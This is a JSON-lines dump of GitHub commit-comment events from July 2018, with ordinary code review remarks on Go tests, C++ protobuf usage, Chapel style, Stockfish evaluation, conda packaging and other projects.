{"id":"8017441625","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29831120,"position":33,"line":31,"path":"price_test.go","commit_id":"1f6d8feec03dc57c2962b28ffd7c66038124ce69","created_at":"2018-07-25T15:56:02Z","updated_at":"2018-07-25T15:56:02Z","author_association":"COLLABORATOR","body":"Does this TestPriceGet test depends on TestPriceCreate test?   If so,  please check if \"go test\" run your tests sequentially based on your order,  or they could be run any order.   My understanding is they can be run in any order.\r\nSometime even parallelly. "}},"created_at":"2018-07-25T15:56:02Z"}
{"id":"8017445880","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29831127,"position":42,"line":275,"path":"google/cloud/bigtable/internal/instance_admin.cc","commit_id":"7b43b78dfeeea25e16e674d216f38239903c0859","created_at":"2018-07-25T15:56:44Z","updated_at":"2018-07-25T15:56:44Z","author_association":"NONE","body":"I think that is not right, `set_allocated_*` is supposed to take a pointer allocated from the heap. You probably want:\r\n\r\n```C++\r\n*request.mutable_policy() = std::move(policy);\r\n```\r\n"}},"created_at":"2018-07-25T15:56:44Z"}
{"id":"8017449831","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29831130,"position":52,"line":52,"path":"modules/phase_field/src/materials/InterfaceAnisotropyMaterial.C","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:57:22Z","updated_at":"2018-07-25T15:57:22Z","author_association":"NONE","body":"Change to new material name here"}},"created_at":"2018-07-25T15:57:22Z"}
{"id":"8017449974","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29831131,"position":null,"line":null,"path":null,"commit_id":"f354740abc3c6445c6f0ed8d62f10f3fc84386a3","created_at":"2018-07-25T15:57:23Z","updated_at":"2018-07-25T15:57:23Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-25T15:57:23Z"}
{"id":"8017450098","type":"CommitCommentEvent","actor":{"login":"archaeogeek"},"repo":{"name":"AstunTechnology/Loader"},"payload":{"comment":{"id":29831132,"position":null,"line":null,"path":null,"commit_id":"52bc92e4aef6604f67245e3c3c7ceea60b489612","created_at":"2018-07-25T15:57:25Z","updated_at":"2018-07-25T15:57:25Z","author_association":"MEMBER","body":"After checking a couple of other licensing resources, I think you're right for the MIT license, and it's not a specific additional requirement of the OSGeo Incubation Program, so we're cool :-)"}},"created_at":"2018-07-25T15:57:25Z"}
{"id":"8017452504","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29831139,"position":66,"line":51,"path":"price_test.go","commit_id":"1f6d8feec03dc57c2962b28ffd7c66038124ce69","created_at":"2018-07-25T15:57:48Z","updated_at":"2018-07-25T15:57:48Z","author_association":"COLLABORATOR","body":"You can write following function:\r\n\r\ntest_call(url_path,  body, expected_status, expected_body)\r\n\r\nit can be re-used in all your tests"}},"created_at":"2018-07-25T15:57:48Z"}
{"id":"8017454468","type":"CommitCommentEvent","actor":{"login":"Carpe2016"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29831141,"position":null,"line":null,"path":null,"commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:58:09Z","updated_at":"2018-07-25T15:58:09Z","author_association":"OWNER","body":"Ok. I will work on that. Thank you. @laagesen "}},"created_at":"2018-07-25T15:58:09Z"}
{"id":"8017460275","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29831150,"position":null,"line":null,"path":null,"commit_id":"98983922ae6ddeb809ac53afe37bc23872e614a3","created_at":"2018-07-25T15:59:03Z","updated_at":"2018-07-25T15:59:03Z","author_association":"CONTRIBUTOR","body":"Out of steam? You have submitted 10 or more single-line commints with the same comment and missed it in the last one. Lol. You should have submitted just one commit "}},"created_at":"2018-07-25T15:59:03Z"}
{"id":"8017469415","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29831172,"position":null,"line":null,"path":null,"commit_id":"3851b896e4862b204a9969012cb584a77568c892","created_at":"2018-07-25T16:00:24Z","updated_at":"2018-07-25T16:00:24Z","author_association":"CONTRIBUTOR","body":"Run repoman and put keywords back to ~"}},"created_at":"2018-07-25T16:00:24Z"}
{"id":"8017470016","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29831174,"position":null,"line":null,"path":null,"commit_id":"eb6f0415d81fbe00477d78b69640d88508870b9a","created_at":"2018-07-25T16:00:28Z","updated_at":"2018-07-25T16:00:28Z","author_association":"NONE","body":"Congrats!\r\nThis Pv node exclusion conditions are almost useless."}},"created_at":"2018-07-25T16:00:28Z"}
{"id":"8017471240","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29831176,"position":null,"line":null,"path":null,"commit_id":"321b76c302ac4142f615fc5811710e570fbe4ee2","created_at":"2018-07-25T16:00:40Z","updated_at":"2018-07-25T16:00:40Z","author_association":"CONTRIBUTOR","body":"Ah. Yea right, okey, anyway :)\r\n"}},"created_at":"2018-07-25T16:00:40Z"}
{"id":"8017473119","type":"CommitCommentEvent","actor":{"login":"marco-vettucci"},"repo":{"name":"OldTinfoil/raspicomm-module"},"payload":{"comment":{"id":29831179,"position":null,"line":null,"path":null,"commit_id":"238cf33723f326c420aa2a43553ebed6ac3230e3","created_at":"2018-07-25T16:00:57Z","updated_at":"2018-07-25T16:00:57Z","author_association":"NONE","body":"Hi Martin, I try to use your module and works fine!\r\nJust related to the bug, after some raspberry reboot i have find this error:\r\n[ 7519.964237] rpc: rpc_spi_interrupt: error reading FIFO (11)\r\n[ 7519.964261] rpc: WrCfg CC4B FEN=0 SHDN=0 TM=1 RM=1 PM=0 RAM=0 IR=0 ST=1 PE=0 L=0 BR=B -- FFFFFFFF R=1 T=1\r\nIs the same bug that you have described?"}},"created_at":"2018-07-25T16:00:57Z"}
{"id":"8017478233","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29831189,"position":13,"line":25,"path":"contracts/Remittance.sol","commit_id":"811e9b0e0ab2270fc763971203de4548aa5fe5c4","created_at":"2018-07-25T16:01:46Z","updated_at":"2018-07-25T16:01:46Z","author_association":"OWNER","body":"oh, thats a good idea, including `address(this)`"}},"created_at":"2018-07-25T16:01:46Z"}
{"id":"8017478818","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29831192,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T16:01:52Z","updated_at":"2018-07-25T16:01:52Z","author_association":"COLLABORATOR","body":"This would mean some extra color (matrix) processing to support all LUTs designed for Cinelog-C.\r\nI'm out of this unfortunately because IDK the basics of processing and not familiar with that part of code because of the complexity to understand.\r\n\r\nThat is why I asked Ilia to explain at least briefly how color processing pipeline is working in MLV App and some basic underlying theory of color processing itself."}},"created_at":"2018-07-25T16:01:52Z"}
{"id":"8017480888","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831198,"position":7,"line":7,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:02:12Z","updated_at":"2018-07-25T16:02:12Z","author_association":"NONE","body":"With your default values this will create an array with indices from 0 to 256, resulting in an array of size 257. I couldn't see any use for that extra counter."}},"created_at":"2018-07-25T16:02:12Z"}
{"id":"8017481555","type":"CommitCommentEvent","actor":{"login":"LearnByManish"},"repo":{"name":"Learning-By-Manish/Rest-assured"},"payload":{"comment":{"id":29831200,"position":null,"line":null,"path":null,"commit_id":"ab56c2fcd5b74374a5ab2eccba67b908194f7085","created_at":"2018-07-25T16:02:18Z","updated_at":"2018-07-25T16:02:18Z","author_association":"CONTRIBUTOR","body":"Ok"}},"created_at":"2018-07-25T16:02:18Z"}
{"id":"8017483122","type":"CommitCommentEvent","actor":{"login":"JacksonTian"},"repo":{"name":"EOSpace/eos-sync"},"payload":{"comment":{"id":29831205,"position":null,"line":null,"path":null,"commit_id":"8eb6d6d6af0490117c7ef00727be5d38c7f6424a","created_at":"2018-07-25T16:02:33Z","updated_at":"2018-07-25T16:02:33Z","author_association":"NONE","body":"请问 eosdevs-node- 是不是你的应用？"}},"created_at":"2018-07-25T16:02:33Z"}
{"id":"8017498871","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29831240,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T16:05:13Z","updated_at":"2018-07-25T16:05:13Z","author_association":"COLLABORATOR","body":"Anyway you are doing great job! :+1: "}},"created_at":"2018-07-25T16:05:13Z"}
{"id":"8017500916","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831245,"position":14,"line":14,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:05:34Z","updated_at":"2018-07-25T16:05:34Z","author_association":"NONE","body":"You could get rid of all the parentheses in this line. Syntax supports parenthesesless if statements and operator precedence will take care of `<` before `||`. So the line could read\r\n```chapel\r\nif endIndex <= startIndex || place<0 {\r\n```\r\nI assume this would be the preferred style in the yet-to-be written Chapel coding style guide. Someone can correct me if this is a strong statement."}},"created_at":"2018-07-25T16:05:34Z"}
{"id":"8017501624","type":"CommitCommentEvent","actor":{"login":"martinbean"},"repo":{"name":"phpne/phpne.github.io"},"payload":{"comment":{"id":29831246,"position":null,"line":null,"path":null,"commit_id":"d06060932007802557f0ab2f217c65e4d910186a","created_at":"2018-07-25T16:05:42Z","updated_at":"2018-07-25T16:05:42Z","author_association":"MEMBER","body":"The contrast text colour on primary buttons was dark. Slightly darkened the primary colour hue so the contrast colour becomes light."}},"created_at":"2018-07-25T16:05:42Z"}
{"id":"8017505332","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831255,"position":18,"line":18,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:06:20Z","updated_at":"2018-07-25T16:06:20Z","author_association":"NONE","body":"These parentheses can also go"}},"created_at":"2018-07-25T16:06:20Z"}
{"id":"8017507571","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29831258,"position":67,"line":67,"path":"src/components/settingsNavigation/Sharee.vue","commit_id":"6a3b3fccd4336e1092f26754c21de68b66e02bdc","created_at":"2018-07-25T16:06:43Z","updated_at":"2018-07-25T16:06:43Z","author_association":"COLLABORATOR","body":"I just saw you used some scoped scss, but I think we should keep the benefits of the server scss compiler :)\r\nLet's move this to the `/css` directory then :)"}},"created_at":"2018-07-25T16:06:43Z"}
{"id":"8017508073","type":"CommitCommentEvent","actor":{"login":"andrew-k9"},"repo":{"name":"patmccler/NMFer"},"payload":{"comment":{"id":29831260,"position":null,"line":null,"path":null,"commit_id":"7b745b0108ed732e31beae425ea1918dbf76ad41","created_at":"2018-07-25T16:06:49Z","updated_at":"2018-07-25T16:06:49Z","author_association":"COLLABORATOR","body":"@patmccler this is just the Javascript JSON verification for unused files in the \\content folder"}},"created_at":"2018-07-25T16:06:49Z"}
{"id":"8017509450","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29831264,"position":6,"line":5,"path":"src/components/addressBook.vue","commit_id":"6a3b3fccd4336e1092f26754c21de68b66e02bdc","created_at":"2018-07-25T16:07:04Z","updated_at":"2018-07-25T16:07:04Z","author_association":"COLLABORATOR","body":":tada: "}},"created_at":"2018-07-25T16:07:04Z"}
{"id":"8017511551","type":"CommitCommentEvent","actor":{"login":"davidrad13"},"repo":{"name":"drehimself/laravel-ecommerce-example"},"payload":{"comment":{"id":29831269,"position":null,"line":null,"path":null,"commit_id":"41505ee5cba6c1acf64e3508fd792b38c744dc1c","created_at":"2018-07-25T16:07:25Z","updated_at":"2018-07-25T16:07:25Z","author_association":"NONE","body":"Good morning Andre. Doing some tests, I noticed that when a product is removed from the cart while a coupon is being applied, and then the mentioned product is added again it tampers not only the value of the coupon in case of being % but also the product added again has a tampered number always increasing like product price * discount + product price added again. Dont know if that makes sense to you but I'll add some captures to make myself more clear:\r\n\r\n![image](https://user-images.githubusercontent.com/36671000/43212816-053d56b2-9003-11e8-8831-b0c058836182.png)\r\n\r\nThat's just an example or how buffed up the price has become after adding it and removing back and forward.. when its original price is:\r\n\r\n![image](https://user-images.githubusercontent.com/36671000/43212880-29f8cefa-9003-11e8-8726-d1a83a6cb906.png)\r\n"}},"created_at":"2018-07-25T16:07:25Z"}
{"id":"8017514845","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29831274,"position":22,"line":27,"path":"src/components/settingsNavigation/sortContacts.vue","commit_id":"6a3b3fccd4336e1092f26754c21de68b66e02bdc","created_at":"2018-07-25T16:07:59Z","updated_at":"2018-07-25T16:07:59Z","author_association":"COLLABORATOR","body":"class=\"multiselect-vue\" should automatically use the design from server. I need to add this to the docs ^^\r\n:see_no_evil: "}},"created_at":"2018-07-25T16:07:59Z"}
{"id":"8017517945","type":"CommitCommentEvent","actor":{"login":"taldcroft"},"repo":{"name":"sot/skare3"},"payload":{"comment":{"id":29831276,"position":156,"line":162,"path":"ska_conda/pkg_defs/ska3-core/meta.yaml","commit_id":"0fb03f328b3776bf8bce1e245c9cad20648318ab","created_at":"2018-07-25T16:08:33Z","updated_at":"2018-07-25T16:08:33Z","author_association":"MEMBER","body":"It seems confusing to me that zeromq is not here for osx.  My understanding is that zeromq is fundamental to jupyter talking to a kernel.  Doing `conda create -n zmq python=3.6 jupyter` gives `zeromq` in the install list."}},"created_at":"2018-07-25T16:08:33Z"}
{"id":"8017519877","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29831280,"position":null,"line":null,"path":null,"commit_id":"dc1be07940dda6ee1faa9db1bc6505da7a00dc2f","created_at":"2018-07-25T16:08:52Z","updated_at":"2018-07-25T16:08:52Z","author_association":"NONE","body":"I forgot this patch have even a bigger problem. during the function pieces you should not access the other attackedBy info (except king and pawn) because the order in which them calculated is undefined. So you can get different benches for different compilers.\r\npieces is called in search.cpp line 839:\r\n```\r\n// Pieces should be evaluated first (populate attack tables)\r\n    score +=  pieces<WHITE, KNIGHT>() - pieces<BLACK, KNIGHT>()\r\n            + pieces<WHITE, BISHOP>() - pieces<BLACK, BISHOP>()\r\n            + pieces<WHITE, ROOK  >() - pieces<BLACK, ROOK  >()\r\n            + pieces<WHITE, QUEEN >() - pieces<BLACK, QUEEN >();\r\n```\r\nIn which order the single calls to pieces are executed is undefined and so implementation dependent.\r\n\r\nFor your case you should rewrite this as following so you are sure attackedBy for rooks and bishops are already calculated:\r\n```\r\n// Pieces should be evaluated first (populate attack tables)\r\n    score +=  pieces<WHITE, KNIGHT>() - pieces<BLACK, KNIGHT>()\r\n            + pieces<WHITE, BISHOP>() - pieces<BLACK, BISHOP>()\r\n            + pieces<WHITE, ROOK  >() - pieces<BLACK, ROOK  >();\r\n   score += pieces<WHITE, QUEEN >() - pieces<BLACK, QUEEN >();\r\n\r\n```\r\n"}},"created_at":"2018-07-25T16:08:52Z"}
{"id":"8017525268","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831285,"position":20,"line":20,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:09:50Z","updated_at":"2018-07-25T16:09:50Z","author_association":"NONE","body":"You repeat this same shift-and-mask twice in this code. I think this can make a good helper function. In Chapel you can have nested functions (You can define a function within another), and you can declare them as `inline`, which would tell the compiler to basically copy and paste the function definition to all call sites, so that there is no function call overhead.\r\n\r\nI'd recommend a nested inline helper for this shift-and-mask"}},"created_at":"2018-07-25T16:09:50Z"}
{"id":"8017525515","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29831286,"position":13,"line":26,"path":"src/components/settingsNavigation/sortContacts.vue","commit_id":"6a3b3fccd4336e1092f26754c21de68b66e02bdc","created_at":"2018-07-25T16:09:53Z","updated_at":"2018-07-25T16:09:53Z","author_association":"COLLABORATOR","body":"wrong label for :)"}},"created_at":"2018-07-25T16:09:53Z"}
{"id":"8017525990","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29831287,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T16:09:58Z","updated_at":"2018-07-25T16:09:58Z","author_association":"COLLABORATOR","body":"I need full understanding of this:\r\n\r\nRight after debayer: raw color->white balance with camera matrix accounting->converting to some intermediate color space for processing(denoise if needed)->applying LUT if needed->do expo, sat, curves->convert to destination color space."}},"created_at":"2018-07-25T16:09:58Z"}
{"id":"8017529567","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29831294,"position":null,"line":null,"path":null,"commit_id":"215302f06db153bea96ce6f2e805e4774d4c189d","created_at":"2018-07-25T16:10:34Z","updated_at":"2018-07-25T16:10:34Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2946 of 2946 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T16:10:34Z"}
{"id":"8017532911","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831309,"position":20,"line":20,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:11:10Z","updated_at":"2018-07-25T16:11:10Z","author_association":"NONE","body":"Also, 255 is another magic number that could be defined as `param andMask = numBuckets-1;`"}},"created_at":"2018-07-25T16:11:10Z"}
{"id":"8017542980","type":"CommitCommentEvent","actor":{"login":"jmcbroom"},"repo":{"name":"CityOfDetroit/local-services-lookup"},"payload":{"comment":{"id":29831324,"position":7,"line":14,"path":"functions/index.js","commit_id":"47d49bc31102404af968a680217b898bc5ff7197","created_at":"2018-07-25T16:12:57Z","updated_at":"2018-07-25T16:12:57Z","author_association":"MEMBER","body":"🐶 "}},"created_at":"2018-07-25T16:12:57Z"}
{"id":"8017545107","type":"CommitCommentEvent","actor":{"login":"jeanconn"},"repo":{"name":"sot/skare3"},"payload":{"comment":{"id":29831327,"position":156,"line":162,"path":"ska_conda/pkg_defs/ska3-core/meta.yaml","commit_id":"0fb03f328b3776bf8bce1e245c9cad20648318ab","created_at":"2018-07-25T16:13:19Z","updated_at":"2018-07-25T16:13:19Z","author_association":"CONTRIBUTOR","body":"Not for me with conda 4.3.21 (where we are pinned).  There's no problem adding it to the list, obviously, and I agree it is weird, but I'm guessing that pyzmq has the lib built in or everything is just broken in these versions.\r\n\r\n```\r\nsaos-MacBook-Pro-3:skare3 jean$ conda create -n zmq python=3.6.2 jupyter\r\nFetching package metadata .............\r\nSolving package specifications: .\r\n\r\nPackage plan for installation in environment /proj/tconda/envs/zmq:\r\n\r\nThe following NEW packages will be INSTALLED:\r\n\r\n    appnope:            0.1.0-py36_0\r\n    bleach:             1.5.0-py36_0\r\n    certifi:            2016.2.28-py36_0\r\n    decorator:          4.1.2-py36_0\r\n    entrypoints:        0.2.3-py36_0\r\n    html5lib:           0.999-py36_0\r\n    icu:                54.1-0\r\n    ipykernel:          4.6.1-py36_0\r\n    ipython:            6.1.0-py36_0\r\n    ipython_genutils:   0.2.0-py36_0\r\n    ipywidgets:         6.0.0-py36_0\r\n    jedi:               0.10.2-py36_2\r\n    jinja2:             2.9.6-py36_0\r\n    jsonschema:         2.6.0-py36_0\r\n    jupyter:            1.0.0-py36_3\r\n    jupyter_client:     5.1.0-py36_0\r\n    jupyter_console:    5.2.0-py36_0\r\n    jupyter_core:       4.3.0-py36_0\r\n    markupsafe:         1.0-py36_0\r\n    mistune:            0.7.4-py36_0\r\n    nbconvert:          5.2.1-py36_0\r\n    nbformat:           4.4.0-py36_0\r\n    notebook:           5.0.0-py36_0\r\n    openssl:            1.0.2l-0\r\n    pandocfilters:      1.4.2-py36_0\r\n    path.py:            10.3.1-py36_0\r\n    pexpect:            4.2.1-py36_0\r\n    pickleshare:        0.7.4-py36_0\r\n    pip:                9.0.1-py36_1\r\n    prompt_toolkit:     1.0.15-py36_0\r\n    ptyprocess:         0.5.2-py36_0\r\n    pygments:           2.2.0-py36_0\r\n    pyqt:               5.6.0-py36_2\r\n    python:             3.6.2-0\r\n    python-dateutil:    2.6.1-py36_0\r\n    pyzmq:              16.0.2-py36_0\r\n    qt:                 5.6.2-2\r\n    qtconsole:          4.3.1-py36_0\r\n    readline:           6.2-2\r\n    setuptools:         36.4.0-py36_1\r\n    simplegeneric:      0.8.1-py36_1\r\n    sip:                4.18-py36_0\r\n    six:                1.10.0-py36_0\r\n    sqlite:             3.13.0-0\r\n    terminado:          0.6-py36_0\r\n    testpath:           0.3.1-py36_0\r\n    tk:                 8.5.18-0\r\n    tornado:            4.5.2-py36_0\r\n    traitlets:          4.3.2-py36_0\r\n    wcwidth:            0.1.7-py36_0\r\n    wheel:              0.29.0-py36_0\r\n    widgetsnbextension: 3.0.2-py36_0\r\n    xz:                 5.2.3-0\r\n    zlib:               1.2.11-0\r\n\r\nProceed ([y]/n)? n\r\n```"}},"created_at":"2018-07-25T16:13:19Z"}
{"id":"8017546554","type":"CommitCommentEvent","actor":{"login":"jiel-nv"},"repo":{"name":"flang-compiler/flang"},"payload":{"comment":{"id":29831329,"position":null,"line":null,"path":null,"commit_id":"7da0254f387a2e10abbf0b6689c62528c6c1bade","created_at":"2018-07-25T16:13:34Z","updated_at":"2018-07-25T16:13:34Z","author_association":"NONE","body":"I see debug metadata for module variable emitted in the intermediate .ll file, and dwarf info emitted in the object file as well. Debugging with gdb works. Can you please double check?"}},"created_at":"2018-07-25T16:13:34Z"}
{"id":"8017549489","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29831332,"position":22,"line":76,"path":"src/processing/processing.c","commit_id":"9b3d31613ced492a79d3ca8faf130c825077acbf","created_at":"2018-07-25T16:14:05Z","updated_at":"2018-07-25T16:14:05Z","author_association":"COLLABORATOR","body":"Cool!"}},"created_at":"2018-07-25T16:14:05Z"}
{"id":"8017549917","type":"CommitCommentEvent","actor":{"login":"adrian-carro"},"repo":{"name":"AdelaHaoyuYe/spatial-housing-model"},"payload":{"comment":{"id":29831333,"position":38,"line":453,"path":"src/main/java/housing/Household.java","commit_id":"060cca6e73fc65247adf1b67397fc6340b0019a9","created_at":"2018-07-25T16:14:10Z","updated_at":"2018-07-25T16:14:10Z","author_association":"NONE","body":"Why is this needed? As I understand it, `h.resident` cannot be `h.resident = this`, given that in lines 443-446 we have stated that, if this house is the home of the household, i.e., if `h = home`, then we set `h.resident = null` and `home = null`. So I don't really see what this addition would be doing..."}},"created_at":"2018-07-25T16:14:10Z"}
{"id":"8017550048","type":"CommitCommentEvent","actor":{"login":"paulbrands1991"},"repo":{"name":"EMATech/autopower"},"payload":{"comment":{"id":29831334,"position":null,"line":null,"path":null,"commit_id":"b26d0f22bfdead61c984d996ac60caa2acfcb994","created_at":"2018-07-25T16:14:11Z","updated_at":"2018-07-25T16:14:11Z","author_association":"NONE","body":"I know I can run automated scripts on events like main supply failure/ restore.\r\nOnly I couldn’t find the right variables to do so.. I made some simple scripts to run but no reaction from the ups."}},"created_at":"2018-07-25T16:14:11Z"}
{"id":"8017550909","type":"CommitCommentEvent","actor":{"login":"creachadair"},"repo":{"name":"google/kythe"},"payload":{"comment":{"id":29831336,"position":null,"line":null,"path":null,"commit_id":"787cbfea697288760c5d709a5d3d6ed09f52b415","created_at":"2018-07-25T16:14:20Z","updated_at":"2018-07-25T16:14:20Z","author_association":"CONTRIBUTOR","body":"Thanks, that does help."}},"created_at":"2018-07-25T16:14:20Z"}
{"id":"8017552100","type":"CommitCommentEvent","actor":{"login":"dictav"},"repo":{"name":"NagaokaDevelopersStudy/ndsfm"},"payload":{"comment":{"id":29831341,"position":5,"line":14,"path":"docs/index.html","commit_id":"5db43f28589b4123046c0ffe540eb4d5246380fb","created_at":"2018-07-25T16:14:32Z","updated_at":"2018-07-25T16:14:32Z","author_association":"MEMBER","body":"https://github.com/NagaokaDevelopersStudy/Studies/issues/39"}},"created_at":"2018-07-25T16:14:32Z"}
{"id":"8017553316","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831345,"position":38,"line":38,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:14:46Z","updated_at":"2018-07-25T16:14:46Z","author_association":"NONE","body":"This line is good for now. But when you move towards the distributed implementation, we need to make sure that this swap is efficient. I am especially curious as to where the temporary data is stored. If not efficient, it would be nice to create an issue about it."}},"created_at":"2018-07-25T16:14:46Z"}
{"id":"8017553967","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29831352,"position":29,"line":46,"path":"QieGaoWorld/views/login.py","commit_id":"19226f106ec465b9285fdd658a24fc7220fb486c","created_at":"2018-07-25T16:14:54Z","updated_at":"2018-07-25T16:14:54Z","author_association":"OWNER","body":"其实这里的 except MultipleObjectsReturned 没用。。。。。"}},"created_at":"2018-07-25T16:14:54Z"}
{"id":"8017554418","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29831353,"position":112,"line":90,"path":"src/hdskins/java/com/voxelmodpack/hdskins/skins/LegacySkinServer.java","commit_id":"c72120efd1c006f628adef44c7479f8610b814ac","created_at":"2018-07-25T16:14:58Z","updated_at":"2018-07-25T16:14:58Z","author_association":"MEMBER","body":"Where did this go?"}},"created_at":"2018-07-25T16:14:58Z"}
{"id":"8017555725","type":"CommitCommentEvent","actor":{"login":"scarr"},"repo":{"name":"apereo/cas"},"payload":{"comment":{"id":29831362,"position":null,"line":null,"path":null,"commit_id":"bc146e8943cf4175c1ccff92de1bb7962d0f678c","created_at":"2018-07-25T16:15:12Z","updated_at":"2018-07-25T16:15:12Z","author_association":"NONE","body":"Issue seems to be still occurring on CAS 5.3.x. "}},"created_at":"2018-07-25T16:15:12Z"}
{"id":"8017558418","type":"CommitCommentEvent","actor":{"login":"mikaelhadler"},"repo":{"name":"mikaelhadler/vue2-github-api"},"payload":{"comment":{"id":29831369,"position":null,"line":null,"path":null,"commit_id":"a43189161177da7b72049f18a2fb63f72747ca07","created_at":"2018-07-25T16:15:40Z","updated_at":"2018-07-25T16:15:40Z","author_association":"OWNER","body":"#8"}},"created_at":"2018-07-25T16:15:40Z"}
{"id":"8017558944","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29831370,"position":null,"line":null,"path":null,"commit_id":"bbb653648512631ff3be29b7652fdad16479e97a","created_at":"2018-07-25T16:15:46Z","updated_at":"2018-07-25T16:15:46Z","author_association":"CONTRIBUTOR","body":"C'est parce que le texte anglais a changé : avant il n'y avait pas de {0}, maintenant il y en a :-) \r\nIl faut en fait lire systématiquement un fichier, de A à Z.\r\n"}},"created_at":"2018-07-25T16:15:46Z"}
{"id":"8017561848","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29831373,"position":null,"line":null,"path":null,"commit_id":"bbb653648512631ff3be29b7652fdad16479e97a","created_at":"2018-07-25T16:16:18Z","updated_at":"2018-07-25T16:16:18Z","author_association":"CONTRIBUTOR","body":"Il y a même où {0} devient {3} etc"}},"created_at":"2018-07-25T16:16:18Z"}
